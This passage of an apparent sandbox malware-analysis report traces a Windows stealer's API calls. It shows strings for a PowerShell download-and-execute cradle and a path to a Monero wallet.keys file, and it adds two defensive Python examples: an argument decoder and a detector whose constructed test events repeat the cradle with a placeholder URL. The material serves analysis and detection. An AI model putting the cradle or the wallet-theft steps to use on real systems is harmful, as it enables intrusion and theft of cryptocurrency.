                               • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 5c80f2d61dc42a4ba7ab2119051af2a767caebb87190277cbaf09165f01990c0
                              • Instruction ID: fb6c5920ad5c482144e98e00ca83478af237afcbe6f5f96a8bd11e22ac2c5401
                              • Opcode Fuzzy Hash: 5c80f2d61dc42a4ba7ab2119051af2a767caebb87190277cbaf09165f01990c0
                              • Instruction Fuzzy Hash: CA0167B5E54308BBD700DFE0DC49FAEB7B8EB44701F004555FA05A7281D6745550DB91
                              APIs
                              • CreateFileA.KERNEL32(:z,80000000,00000003,00000000,00000003,00000080,00000000,?,007A3AEE,?), ref: 007A92FC
                              • GetFileSizeEx.KERNEL32(000000FF,:z), ref: 007A9319
                              • CloseHandle.KERNEL32(000000FF), ref: 007A9327
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                               • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID: :z$:z
                              • API String ID: 1378416451-1860088793
                              • Opcode ID: 52fa038433ba38c1bcb09c795380c9cb4eb27579b112fceda5f31f7538526942
                              • Instruction ID: 87ac6d04a0507a0615a9bc00c7c04121a6e5dd197e1ed87b686a66ff69cefc31
                              • Opcode Fuzzy Hash: 52fa038433ba38c1bcb09c795380c9cb4eb27579b112fceda5f31f7538526942
                              • Instruction Fuzzy Hash: 16F04F35E55208FBDF10DFB0DC49F9E77B9AB88711F10C294B651A72C0DA7496519B40
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007999EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00799A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00799A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,0079148F,00000000), ref: 00799A5A
                              • LocalFree.KERNEL32(0079148F), ref: 00799A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00799A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                               • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 68b46443713682b4e67c5a6cf7f725524ae9508c4f33233f998b164248fb0135
                              • Instruction ID: 29016bfb4a84bd888b0913371d086b782533955eb9b3385d7dc58bbf5214d963
                              • Opcode Fuzzy Hash: 68b46443713682b4e67c5a6cf7f725524ae9508c4f33233f998b164248fb0135
                              • Instruction Fuzzy Hash: 013128B4A01209EFEF14CF94D985BAE77F5FF48340F108158E901A7290D778AA91DFA1
                              APIs
                              • lstrcat.KERNEL32(?,014CE160), ref: 007A47DB
                                • Part of subcall function 007A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007A8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 007A4801
                              • lstrcat.KERNEL32(?,?), ref: 007A4820
                              • lstrcat.KERNEL32(?,?), ref: 007A4834
                              • lstrcat.KERNEL32(?,014BB980), ref: 007A4847
                              • lstrcat.KERNEL32(?,?), ref: 007A485B
                              • lstrcat.KERNEL32(?,014CD760), ref: 007A486F
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007A8D90: GetFileAttributesA.KERNEL32(00000000,?,00791B54,?,?,007B564C,?,?,007B0E1F), ref: 007A8D9F
                                • Part of subcall function 007A4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007A4580
                                • Part of subcall function 007A4570: RtlAllocateHeap.NTDLL(00000000), ref: 007A4587
                                • Part of subcall function 007A4570: wsprintfA.USER32 ref: 007A45A6
                                • Part of subcall function 007A4570: FindFirstFileA.KERNEL32(?,?), ref: 007A45BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                               • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 702108ba3c4b7c35502d4b15750fc3ac88b0636ee58dca3b29ab4358cdb2ffa3
                              • Instruction ID: 0f7bef20667f06c114ab76cd66b2d436eb414ac38b8b105218312a2d8528f354
                              • Opcode Fuzzy Hash: 702108ba3c4b7c35502d4b15750fc3ac88b0636ee58dca3b29ab4358cdb2ffa3
                              • Instruction Fuzzy Hash: A23187B6D50208A7CB50F7B0DC89EEE737CAB88700F404689B71556091DE78ABC9DB96
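The numeric arguments in the API lines above carry most of the analytic value, but Joe Sandbox prints them as raw hex: `80000002` and `00020119` in the RegOpenKeyExA calls are HKEY_LOCAL_MACHINE and KEY_READ with KEY_WOW64_64KEY set (this 32-bit sample explicitly asks for the native 64-bit registry view before reading CurrentBuildNumber), the CreateFileA calls are GENERIC_READ / OPEN_EXISTING opens of a file that is then sized and read whole, the SHGetFolderPathA subcall resolves CSIDL_LOCAL_APPDATA (0x1C), the folder under which `\Monero\wallet.keys` is later appended, and LocalAlloc's 0x40 is LPTR (zeroed, fixed). The decoder below is an added example for this report, not Joe Sandbox code: it parses the report's `Api.MODULE(args), ref: addr` lines and names the constants at the argument positions that are documented for each API. Assumptions: every 8-hex-digit token is treated as a number (an inline string of exactly 8 hex characters would be misread; none occurs above), pointer arguments such as `014BC428` are left raw because the report does not show what they point to, and values beyond an API's real parameter count (GetProcessHeap shows two although it takes none) are stack slots that the decoder ignores.

```python
"""Decode the numeric arguments in Joe Sandbox 'APIs' lines.

Added example for this report; not Joe Sandbox code. Constants are the
documented Win32 values (winnt.h, winreg.h, shlobj.h); only argument
positions we know are decoded, everything else is returned raw.
"""
import re
from typing import Callable, Dict, Optional

# One traced call per line:  Api.MODULE(arg,arg,...), ref: <caller address>
# Subcall lines carry a "Part of subcall function XXXXXXXX:" prefix.
API_LINE = re.compile(
    r"^(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Joe prints numbers as 8 hex digits; anything else is an inline string or '?'.
# Assumption: an inline string that is itself 8 hex characters would be misread.
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")

HKEY_ROOTS = {
    0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS",
    0x80000005: "HKEY_CURRENT_CONFIG",
}
REG_ACCESS_BITS = [
    (0x00020000, "READ_CONTROL"), (0x00000001, "KEY_QUERY_VALUE"),
    (0x00000008, "KEY_ENUMERATE_SUB_KEYS"), (0x00000010, "KEY_NOTIFY"),
    (0x00000002, "KEY_SET_VALUE"), (0x00000004, "KEY_CREATE_SUB_KEY"),
    (0x00000020, "KEY_CREATE_LINK"),
    (0x00000100, "KEY_WOW64_64KEY"), (0x00000200, "KEY_WOW64_32KEY"),
]
KEY_READ_PARTS = {"READ_CONTROL", "KEY_QUERY_VALUE", "KEY_ENUMERATE_SUB_KEYS", "KEY_NOTIFY"}
GENERIC_ACCESS_BITS = [
    (0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
    (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL"),
]
FILE_SHARE_BITS = [(0x1, "FILE_SHARE_READ"), (0x2, "FILE_SHARE_WRITE"), (0x4, "FILE_SHARE_DELETE")]
CREATION_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                        4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTR_BITS = [(0x00000080, "FILE_ATTRIBUTE_NORMAL"), (0x02000000, "FILE_FLAG_BACKUP_SEMANTICS")]
CSIDL = {0x00: "CSIDL_DESKTOP", 0x05: "CSIDL_PERSONAL", 0x1A: "CSIDL_APPDATA",
         0x1C: "CSIDL_LOCAL_APPDATA", 0x28: "CSIDL_PROFILE"}
LMEM_BITS = [(0x0002, "LMEM_MOVEABLE"), (0x0040, "LMEM_ZEROINIT")]


def flags(value: int, table) -> str:
    """Render a bitmask as NAME|NAME, keeping any unknown bits as hex."""
    names = [name for bit, name in table if value & bit]
    known = 0
    for bit, _ in table:
        known |= bit
    if value & ~known:
        names.append(f"0x{value & ~known:X}")
    return "|".join(names) if names else "0"


def reg_access(value: int) -> str:
    """samDesired: collapse the four KEY_READ bits, leave the WOW64 view bits visible."""
    names = flags(value, REG_ACCESS_BITS).split("|")
    if KEY_READ_PARTS <= set(names):
        names = ["KEY_READ"] + [n for n in names if n not in KEY_READ_PARTS]
    return "|".join(names)


# api name -> {argument index: decoder}. Indices follow the documented prototypes.
DECODERS: Dict[str, Dict[int, Callable[[int], str]]] = {
    "RegOpenKeyExA": {0: lambda v: HKEY_ROOTS.get(v, f"hKey=0x{v:X}"), 3: reg_access},
    "RegOpenKeyExW": {0: lambda v: HKEY_ROOTS.get(v, f"hKey=0x{v:X}"), 3: reg_access},
    "CreateFileA": {1: lambda v: flags(v, GENERIC_ACCESS_BITS),
                    2: lambda v: flags(v, FILE_SHARE_BITS),
                    4: lambda v: CREATION_DISPOSITION.get(v, f"0x{v:X}"),
                    5: lambda v: flags(v, FILE_ATTR_BITS)},
    "SHGetFolderPathA": {1: lambda v: CSIDL.get(v, f"CSIDL 0x{v:X}")},
    "LocalAlloc": {0: lambda v: "LPTR" if v == 0x40 else flags(v, LMEM_BITS)},
}


def parse_api_line(line: str) -> Optional[dict]:
    """Return api/module/ref/args plus decoded constants, or None if not an API line."""
    m = API_LINE.match(line.strip().lstrip("•").strip())
    if not m:
        return None
    raw_args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    decoded: Dict[int, str] = {}
    # Joe dumps stack slots beyond the real parameter count, so only known positions are decoded.
    for idx, fn in DECODERS.get(m.group("api"), {}).items():
        if idx < len(raw_args) and HEX8.match(raw_args[idx]):
            decoded[idx] = fn(int(raw_args[idx], 16))
    return {"api": m.group("api"), "module": m.group("module"),
            "ref": int(m.group("ref"), 16), "args": raw_args, "decoded": decoded}


if __name__ == "__main__":
    # Lines taken from the report above.
    for line in [
        "• RegOpenKeyExA.ADVAPI32(80000002,014BC428,00000000,00020119,00000000), ref: 007A76DD",
        "• CreateFileA.KERNEL32(:z,80000000,00000003,00000000,00000003,00000080,00000000,?,007A3AEE,?), ref: 007A92FC",
        "• Part of subcall function 007A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007A8E0B",
        "• LocalAlloc.KERNEL32(00000040,?), ref: 00799A31",
    ]:
        r = parse_api_line(line)
        print(f"{r['api']}@{r['ref']:08X}: {r['decoded']}")
```

The `ref` values it returns are caller addresses inside the 0x790000 image that the Memory Dump Source lines describe, so they can be used directly as offsets into the `.sdmp` dumps when following a call back to its function.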
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 007A2D85
                              Strings
                              • ')", xrefs: 007A2CB3
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 007A2CC4
                              • <, xrefs: 007A2D39
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 007A2D04
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                               • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: c77790c32f9c1ac1ca67b58ff595879d925192a10a68468882be79c996240f88
                              • Instruction ID: 5a21a391c4ef1ed7abf5142bb956bdf0de7c84a6cd702bcb9e4eddea689dad26
                              • Opcode Fuzzy Hash: c77790c32f9c1ac1ca67b58ff595879d925192a10a68468882be79c996240f88
                              • Instruction Fuzzy Hash: E941E171D10208EADB55FFA0C899BEEB7B4AF51300F404269F006A7192DF7C6A4ACF91
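The function above is the sample's download-and-execute stage: it concatenates the literal SysWOW64 PowerShell path with `-nop -c "iex(New-Object Net.WebClient).DownloadString('`, a URL (not shown in this section), and `')"`, then launches it through ShellExecuteEx; the 0x3C passed to ShellExecuteEx is sizeof(SHELLEXECUTEINFOA) on 32-bit Windows, which is consistent with a 32-bit loader spawning the 32-bit PowerShell host. The detector below is an added example for this report, not code from the sample or from Joe Sandbox: it runs over process-creation events and flags PowerShell command lines that pair an Invoke-Expression with a DownloadString cradle, tolerating the backtick splitting and case changes commonly used to break naive string matches, and it notes when the SysWOW64 host is started from a user-writable parent. The events and URLs are constructed for the example (the report shows only the prefix and suffix of the cradle, so `example.invalid` stands in for the real URL).

```python
"""Flag PowerShell download-and-execute cradles in process-creation telemetry.

Added example for this report, not part of it. The events below are
constructed in the shape of Sysmon Event ID 1 fields; the URLs are
placeholders, since this report section shows only the cradle's prefix
and suffix strings, not the URL that the sample inserts between them.
"""
import re
from typing import Dict, List, Optional

SAMPLE_EVENTS: List[Dict[str, str]] = [
    # Constructed: the shape the sample's strings above would produce.
    {"ParentImage": r"C:\Users\victim\Downloads\file.exe",
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": (r'"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -nop -c '
                     r'''"iex(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"''')},
    # Constructed benign administrative use: no download, no Invoke-Expression.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    # Constructed: same cradle with backtick keyword splitting and a hidden window.
    {"ParentImage": r"C:\Users\victim\AppData\Local\Temp\dropper.exe",
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'''powershell -NoP -W Hidden -C "I`E`X (New-Object Net.WebClient).downloadstring('http://example.invalid/x')"'''},
]

DOWNLOADSTRING = re.compile(r"downloadstring\(\s*['\"]([^'\"]+)['\"]\s*\)", re.IGNORECASE)
INVOKE_EXPR = re.compile(r"\biex\b|invoke-expression")


def analyze_event(ev: Dict[str, str]) -> Optional[dict]:
    """Return a finding for a PowerShell download cradle, or None."""
    image = ev["Image"].lower()
    if not image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        return None
    # Backtick is PowerShell's escape character; attackers split keywords with it
    # (I`E`X), so remove it before matching, then fold case and whitespace.
    stripped = ev["CommandLine"].replace("`", "")
    cmd = re.sub(r"\s+", " ", stripped).lower()
    indicators: List[str] = []
    if re.search(r"(^| )-nop(rofile)?( |$)", cmd):
        indicators.append("noprofile")
    if re.search(r"(^| )-w(indowstyle)? hidden", cmd):
        indicators.append("hidden_window")
    if "net.webclient" in cmd:
        indicators.append("webclient")
    if INVOKE_EXPR.search(cmd):
        indicators.append("invoke_expression")
    url = DOWNLOADSTRING.search(stripped)  # original case, so the URL is kept intact
    if url:
        indicators.append("downloadstring")
    # A 32-bit loader gets the SysWOW64 host; from a user-writable parent that is notable.
    if "\\syswow64\\" in image and not ev["ParentImage"].lower().startswith("c:\\windows\\"):
        indicators.append("wow64_powershell_from_user_path")
    # Download-and-execute needs both halves; either alone is common in benign scripts.
    if "invoke_expression" not in indicators or url is None:
        return None
    return {"image": ev["Image"], "parent": ev["ParentImage"],
            "url": url.group(1), "indicators": indicators}


def scan(events: List[Dict[str, str]]) -> List[dict]:
    """Apply analyze_event to every event and keep the findings."""
    return [f for f in (analyze_event(e) for e in events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The extracted URL is the artefact to pivot on: it is the same value the loader would have placed between the `DownloadString('` and `')"` fragments shown in the Strings list above, and Sysmon Event ID 3 or proxy logs from the same host can then confirm whether the second stage was actually fetched.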
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00799F41
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                               • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 621be8d275c8f96c6b2402acddfbfa4461fde47648222cea48ebdea0b6655b34
                              • Instruction ID: 9410a54fa3f78cfeeba8c328d0ff160dc707e2b8c8b622e37bbf2d92ea63eb99
                              • Opcode Fuzzy Hash: 621be8d275c8f96c6b2402acddfbfa4461fde47648222cea48ebdea0b6655b34
                              • Instruction Fuzzy Hash: A3611171A10248EFDF14EFA4DC99FEE7775AF85300F408518F90A5B191EB786A05CB92
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,014CD7E0,00000000,00020119,?), ref: 007A40F4
                              • RegQueryValueExA.ADVAPI32(?,014CE190,00000000,00000000,00000000,000000FF), ref: 007A4118
                              • RegCloseKey.ADVAPI32(?), ref: 007A4122
                              • lstrcat.KERNEL32(?,00000000), ref: 007A4147
                              • lstrcat.KERNEL32(?,014CE2E0), ref: 007A415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                               • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: 347a013a47c12eb558fbc4e003b38387d58bb4973ebfe4ddb72a45ad8e475596
                              • Instruction ID: a6008b31c61ea1da5d2fda1100b84e128365f923a38f169de73b93f045046a86
                              • Opcode Fuzzy Hash: 347a013a47c12eb558fbc4e003b38387d58bb4973ebfe4ddb72a45ad8e475596
                              • Instruction Fuzzy Hash: 4241B8B6D50108ABDB14EBA0EC4AFFE733DAB88300F404559B61557181EA795BD88BD2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007A7E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A7E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,014BC380,00000000,00020119,?), ref: 007A7E5E
                              • RegQueryValueExA.ADVAPI32(?,014CD700,00000000,00000000,000000FF,000000FF), ref: 007A7E7F
                              • RegCloseKey.ADVAPI32(?), ref: 007A7E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                               • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
